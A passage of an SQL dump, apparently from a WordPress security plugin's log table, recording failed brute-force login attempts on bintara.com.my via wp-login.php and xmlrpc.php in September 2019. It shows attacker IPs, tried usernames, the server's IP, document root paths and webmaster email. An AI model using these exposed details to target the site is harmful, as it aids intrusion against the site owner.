14:04:33',17738952,19229936,'https://bintara.com.my/wp-login.php',1,0,'159.203.12.18'),(24145,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.12.18\";s:11:\"REMOTE_PORT\";s:5:\"49886\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@WdB0uvyt9KRYoKL8aCAAAABc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568642676.6518\";s:12:\"REQUEST_TIME\";s:10:\"1568642676\";}}','notice','2019-09-16 14:04:38','2019-09-16 14:04:36',18253992,19553336,'https://bintara.com.my/xmlrpc.php',1,0,'159.203.12.18'),(24146,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.173.177\";s:11:\"REMOTE_PORT\";s:5:\"44426\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@Xgx0uvyt9KRYoKL8axwAAABA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568642947.2999\";s:12:\"REQUEST_TIME\";s:10:\"1568642947\";}}','notice','2019-09-16 14:09:09','2019-09-16 14:09:07',17739864,19231624,'https://bintara.com.my/wp-login.php',1,0,'68.183.173.177'),(24147,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.173.177\";s:11:\"REMOTE_PORT\";s:5:\"45048\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@Xhmf5CPZPc3WLyovI4AAAANg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568642950.957\";s:12:\"REQUEST_TIME\";s:10:\"1568642950\";}}','notice','2019-09-16 14:09:12','2019-09-16 14:09:11',18255112,19555184,'https://bintara.com.my/xmlrpc.php',1,0,'68.183.173.177'),(24148,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"103.8.79.204\";s:11:\"REMOTE_PORT\";s:5:\"44974\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@Ygx0uvyt9KRYoKL8bUgAAAA4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568643203.9224\";s:12:\"REQUEST_TIME\";s:10:\"1568643203\";}}','notice','2019-09-16 14:13:25','2019-09-16 14:13:24',17744696,19231344,'https://bintara.com.my/wp-login.php',1,0,'103.8.79.204'),(24149,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"103.8.79.204\";s:11:\"REMOTE_PORT\";s:5:\"44974\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@Ygx0uvyt9KRYoKL8bUgAAAA4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568643203.9224\";s:12:\"REQUEST_TIME\";s:10:\"1568643203\";}}','notice','2019-09-16 14:13:25','2019-09-16 14:13:24',17906544,19231344,'https://bintara.com.my/wp-login.php',1,0,'103.8.79.204'),(24150,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"103.8.79.204\";s:11:\"REMOTE_PORT\";s:5:\"45426\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@YhR0uvyt9KRYoKL8bUwAAABU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568643206.0834\";s:12:\"REQUEST_TIME\";s:10:\"1568643206\";}}','notice','2019-09-16 14:13:27','2019-09-16 14:13:26',18255432,19554952,'https://bintara.com.my/xmlrpc.php',1,0,'103.8.79.204'),(24151,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"91.227.6.17\";s:11:\"REMOTE_PORT\";s:5:\"53462\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@aTh0uvyt9KRYoKL8cmAAAAAs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568643662.1942\";s:12:\"REQUEST_TIME\";s:10:\"1568643662\";}}','notice','2019-09-16 14:21:03','2019-09-16 14:21:02',17739320,19230112,'https://bintara.com.my/wp-login.php',1,0,'91.227.6.17'),(24152,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"91.227.6.17\";s:11:\"REMOTE_PORT\";s:5:\"53928\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@aUWf5CPZPc3WLyovJVgAAANI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568643665.7103\";s:12:\"REQUEST_TIME\";s:10:\"1568643665\";}}','notice','2019-09-16 14:21:07','2019-09-16 14:21:06',18257424,19557672,'https://bintara.com.my/xmlrpc.php',1,0,'91.227.6.17'),(24153,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"139.59.100.255\";s:11:\"REMOTE_PORT\";s:5:\"53050\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@aUh0uvyt9KRYoKL8cmwAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568643666.9245\";s:12:\"REQUEST_TIME\";s:10:\"1568643666\";}}','notice','2019-09-16 14:21:08','2019-09-16 